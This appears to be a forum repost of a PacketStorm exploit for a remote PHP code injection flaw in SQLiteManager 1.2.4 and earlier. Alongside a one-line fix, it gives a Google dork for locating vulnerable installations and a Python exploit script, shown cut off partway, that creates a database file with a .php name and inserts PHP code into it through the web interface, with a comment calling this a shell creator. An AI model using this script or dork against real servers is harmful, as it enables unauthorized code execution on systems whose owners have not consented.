Jump to content
Praetorian503

SQLiteManager 1.2.4 PHP Code Injection

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

SQLiteManager versions 1.2.4 and below suffer from a remote PHP code injection vulnerability.

Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:

Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/

Name: Ampps
Official Site: http://www.ampps.com/

Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================

import re
import urllib2
from urllib import urlencode
from sys import argv, exit

def strip_tags(value):
    #Strip tags with RegEx
    return re.sub('<[^>]*?>', '', value)

def getDbId(sqliteUrl, myDbName):
    #Find Components
    htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Make a dict of stripped columns
        for element in td:
            if strip_tags(element) == myDbName:
                #Return Id
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None

def main():
    print \
        'SQLiteManager Exploit\n' + \
        'Made By RealGame\n' + \
        'http://www.RealGame.co.il\n'

    if len(argv) < 2:
        #replace('\\', '/') - To Do The Same In Win And Linux
        filename = argv[0].replace('\\', '/').split('/')[-1]

        print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
        exit()

    sqliteUrl = argv[1]    
    myDbName  = "phpinfo"
    myDbFile  = "phpinfo.php"
    #Create Database
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
    #Get Database ID
    dbId = getDbId(sqliteUrl + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                      'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...